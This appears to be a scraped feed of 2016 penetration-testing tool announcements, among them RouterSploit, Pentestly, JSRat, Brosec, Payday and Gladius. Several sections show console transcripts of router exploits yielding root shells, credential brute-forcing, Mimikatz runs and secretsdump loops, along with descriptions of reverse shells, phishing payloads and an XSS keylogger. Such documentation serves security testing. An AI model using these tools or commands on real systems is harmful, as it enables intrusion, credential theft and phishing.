In the making of PentestBox we have included only the best tools , but in that process we have missed some tools which you might want to use. In that case you can easily install those tools using toolsmanager present inside PentestBox, it can install/update/Uninstall tools which are not there in PentestBox.

Less Memory Usage

PentestBox runs on host machine without any need for virtual machine. So it only need's 20 MB for launching compared to atleast 2GB of RAM need for running virtual machine distributions.

Less Disk Usage

It is very light on Disk as well, it only acquires less than third of linux pentesting distro do.

InBuilt Browser

PentestBox contains a version of Mozilla Firefox Browser with nearly all security addons. To know the complete list of addons, please click here.

Cool Update Feature

It contains an update feature through which you can keep your tools updated. To know more about update feature, please click here.

Can be shared on a network

Consider a environment where you want to use PentestBox on many computers like office, lab, etc. Instead of installing PentestBox on each and every computer, you can just install that on one computer and share that folder as a drive to other computers on the same network. Check about this feature here.



LynxFramework - Extension Exploitation Framework

March 30, 2016, 3:30 pm
$
0
0

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework est un outil d'exploitation pour navigateur web vous proposant un service d'effet specialise dans le developpement d'extension pour navigateur, a savoir Google Chrome et prochainement Firefox. Le fonctionnement est base sur l'injection de script dans l'extension afin de recuperer des donnees ciblees.

 
Lynx Framework - Force download payload from Lynx Framework on Vimeo.

LAST ONLINE PAYLOAD

XSSKeylooger keylooger xss
ForceDownload force file download
paytoweb www.paytoweb.com
Paypal https://www.paypal.com/signin/
Facebook http://facebook.com


Firmwalker - Script for searching the extracted firmware file system for goodies!

March 31, 2016, 3:16 pm
$
0
0

A simple bash script for searching the extracted or mounted firmware file system.

It will search through the extracted or mounted firmware file system for things of interest such as:
  • etc/shadow and etc/passwd
  • list out the etc/ssl directory
  • search for SSL related files such as .pem, .crt, etc.
  • search for configuration files
  • look for script files
  • search for other .bin files
  • look for keywords such as admin, password, remote, etc.
  • search for common web servers used on IoT devices
  • search for common binaries such as ssh, tftp, dropbear, etc.
  • search for URLs, email addresses and IP addresses
  • NOTE: Some of the data written to the file may be quite verbose. It that case, the data can be reviewed and then deleted if desired from the file.

Usage
  • If you wish to use the static code analysis portion of the script, please install eslint: npm i -g eslint
  • ./firmwalker {path to root file system} {path for firmwalker.txt}
  • Example: ./firmwalker linksys/fmk/rootfs ../firmwalker.txt
  • A file firmwalker.txt will be created in the same directory as the script file unless you specify a different filename as the second argument
  • Do not put the firmwalker.sh file inside the directory to be searched, this will cause the script to search itself and the file it is creating
  • chmod 0700 firmwalker.sh

How to extend

Script created by Craig Smith and expanded by:
  • Athanasios Kostopoulos
  • misterch0c

Links


JSRat - Reverse HTTP Shell Using JavaScript

April 1, 2016, 3:17 pm
$
0
0

JSRat is a reverse HTTP Shell by using JavaScript. JSRat use rundll32.exe to load the JavaScript code in cmd and a HTTP Shell is returned when the code is executed. The special part is that after running the cmd command, rundll32.exe will remain in the background to continuously connect to the Server. No file is written to the disk during the whole process, which significantly enhances stealth.

Characteristics:

To reverse a shell by using cmd to execute codes


Advantages:

  • It can avoid being killed
  • It’s easy to use
  • It’s relatively stealthy.

Exploitation:

Based its characteristics and advantages, using JavaScript as the phishing payload can achieve amazing effect.


Pentestly - Python and Powershell internal Penetration Testing Framework

April 2, 2016, 12:30 pm
$
0
0
Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.

Blog post: Pentestly Framework: When Pentesting Meets Python and Powershell
Author: @ctfhacker / Cory Duplantis

Demo

Current features
  • Import NMAP XML
  • Test SMB authentication using:
    • individual credentials
    • file containing credentials
    • null credentials
    • NTLM hash
  • Test local administrator privileges for successful SMB authentication
  • Identify readable SMB shares for valid credentials
  • Store Domain/Enterprise Admin account names
  • Determine location of running Domain Admin processes
  • Determine systems of logged in Domain Admins
  • Execute Powershell commands in memory and exfil results
  • Execute Mimikatz to gather plaintext password from memory ( Invoke-Mimikatz.ps1 )
  • Receive a command shell ( Powercat )
  • Receive a meterpreter session ( Invoke-Shellcode.ps1 )

Shoulders of Giants
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

Install 
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Usage
Let's walk through several functions currently implemented.

Change workspace 
[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Load from nmap 
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Test logins
Use file with creds to test login 
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Use single username password 
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs i.e. over the 192.168.8.0/24 found in the table 
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Gather Domain and Enterprise admins 
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Run mimikatz over IPs with executable rights 
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Show local admins 
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Show domain admins 
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares 
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Show new shares 
[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Find/Download interesting files 
[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
    -------  -------------                                                                                                                              --------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    yes       source of input (see 'show info' for details)
Can change the pattern to something a bit more specialized 
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)
Execute and download found files 
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt

Contributing
Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py : 
from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module
The key points here are to fill the meta dict with the corresponding information as well as the module_run function for module functionality.
This script is then placed in the modules/ folder or in your personal ~/.pentestly/modules folder for portability.
Stay tuned for a detailed example script explanation in the coming weeks.

TODO
  • Implement secretsdump.py module
  • Add utility functions for database queries similar to creds , services
  • Rework draw_table function to have fixed width columns
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module
  • Look into utilizing Invoke-Shellcode

Changelog

0.1.0 (2016-02-18)
Initial release


Search

RouterSploit - Router Exploitation Framework

April 4, 2016, 4:29 pm
$
0
0

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if target is vulnerable to any exploit

Installation 
sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage 
root@kalidev:~/git/routersploit# ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf >

1. Exploits

Pick the module 
rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
U can use tab key for completion.

Options
Display module options: 
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port
Set options: 
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module
Exploiting target can be achieved by issuing 'run' or 'exploit' command: 
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
It is also possible to check if the target is vulnerable to particular exploit: 
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info
Display information about exploit: 
rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module
Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:
  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp
Every service has been divided into two modules:
  • default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
Console: 
rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

Options 
rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)
Set target: 
rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module 
rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) >

3. Scanners
Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module 
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options 
Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port
Set target: 
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module 
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target. 
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0



Payday - Payload generator that uses Metasploit and Veil

April 5, 2016, 3:43 pm
$
0
0

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads
payday.py --msf --ip 1.1.1.1

Generate Veil Payloads
payday.py --veil --ip 1.1.1.1

Generate Both
payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories
payday.py --clean

Specify custom output directory
payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory
payday --output /path/to/custom --clean


Brosec - An interactive reference tool to help security professionals utilize useful payloads and commands

April 6, 2016, 3:30 pm
$
0
0
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...


Payload Variables


Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).


Available variables
  • LHOST : Local IP or name
  • LPORT : Local IP or name
  • RHOST : Remote IP or name
  • RPORT : Remote IP or name
  • USER : Username (only used in a few payloads)
  • PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.
  • Configuration variables can be viewed via the config command at any time, or by entering the variable name
  • Variables can be changed at any time by entering set <variable> <value>
  • You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
    • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros


In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.


Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).

Installation

Releases
Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec

Manual installation

Mac
  • brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm depdendencies

Kali Linux
  • apt-get install npm build-essential g++ xsel netcat Install dependencies
  • npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
  • npm install -g n Install n (nodejs version manager)
  • n latest Install latest version of nodejs
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm depdendencies

Windows (Unsupported)
  • Install nodejs
  • Install ncat
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc

Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).


GetDataReport - Script to collect information to the client side

April 7, 2016, 3:47 pm
$
0
0

Script in PHP+JS for get information of target through a web application, use $_SERVER functions and JS functions for get information of our client.

Plugin (WEBApps)
in some web applications need to collect information from the client to perform tasks with this plugin will be easier to work with the variables you need. 
<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP               ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser          ".$data->browser();
echo "<br>Screen height    ".$data->height();
echo "<br>Screen width     ".$data->width();
echo "<br>Java enabled     ".$data->javaenabled();
echo "<br>Cookie enabled   ".$data->cookieenabled();
echo "<br>Language         ".$data->language();
echo "<br>Architecture     ".$data->architecture();
echo "<br>Device           ".$data->device();
echo "<br>Country          ".$data->geo('country');
echo "<br>Region           ".$data->geo('region');
echo "<br>Continent        ".$data->geo('continent');
echo "<br>City             ".$data->geo('city');
echo "<br>Logitude         ".$data->geo('logitude');
echo "<br>Latitude         ".$data->geo('latitude');
echo "<br>Currency         ".$data->geo('currency');
echo "<br>Provetor         ".$data->provetor();
echo "<br>Agent            ".$data->agent();
echo "<br>Referer          ".$data->referer();
echo "<br>Date             ".$data->getdate();


 ?>

Hack (Social engineering)
With this script we can collect information from a target performing a routing and generating an html page report. 
        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com


Gladius - Easy mode from Responder to Credentials

April 8, 2016, 4:00 pm
$
0
0

Gladius provides an automated method for cracking credentials from various sources during an engagement. We currently crack hashes from Responder, secretsdump.py, and smart_hashdump.

Install 
pip install watchdog
git clone https://www.github.com/praetorian-inc/gladius
cd gladius
git clone https://www.github.com/praetorian-inc/Hob0Rules
cp Hob0Rules/* .
rm -rf Hob0Rules/

Start 
python gladius.py
Now start the responder session as normal 
cd /usr/share/responder
python Responder.py -i YOUR_IP -I YOUR_INTERFACE

Working with secretsdump
Send results of secretsdump to Gladius for parsing and cracking. 
for ip in $(cat ips); do secretsdump.py DOMAIN/username:password@$ip > /usr/share/responder/secretsdump_$ip; done

Help 
$ python gladius.py -h
usage: gladius.py [-h] [-v] [--responder-dir RESPONDER_DIR]
                  [--hashcat HASHCAT] [-r RULESET] [-w WORDLIST] [--no-art]

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Increased output verbosity
  --responder-dir RESPONDER_DIR
                        Directory to watch for Responder output
  --hashcat HASHCAT     Path to hashcat binary
  -r RULESET, --ruleset RULESET
                        Ruleset to use with hashcat
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist to use with hashcat
  --no-art              Disable the sword ascii art for displaying credentials
                        and default to only text.

Workings

Ruleset
The default ruleset is a better best64 ruleset from Julian Dunning ( @hob0man ) of Praetorian. His presentation on the topic can be found below:



Responder
Watches responder log for *NTLM*txt files. For each file found, parses output, creates a temp file containing the new hashes, and passes this to hashcat with the correct hash type 
To watch for NTLM hashes from hashdump, simply create a file with NTLM hashes from hashdump and drop a file with `hashdump` in its name in the Responder directory.
Note: Will have to manually examine output in `./engagement/responderhander_out/*` to check for results from `hashdump` cracking.

Credentials
Watches for output from hashcat and exports files with the following format: 
Domain Username Password

Example module
To extend Gladius:
  • Create a new Handler class that inherits from GladiusHandler .
  • Add a list of regex matches for your specific file names (or '*' if the filename doesn't matter)
  • Create a process(self, event) function to perform actions on all files matching your pattern. 
class YourHandler(GladiusHandler):

    patterns = ['*']

    def process(self, event):
        data = self.get_lines(event)

        # Perform work on data
Add yourself to the handlers list 
handlers = [
            (ResponderHandler, args.responder,
            (CredsHandler, ResponderHandler().outpath),
            (YourHandler, CredsHandler().outpath),
            (YourHandler, '/tmp'),
           ]


Viewing all 5816 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>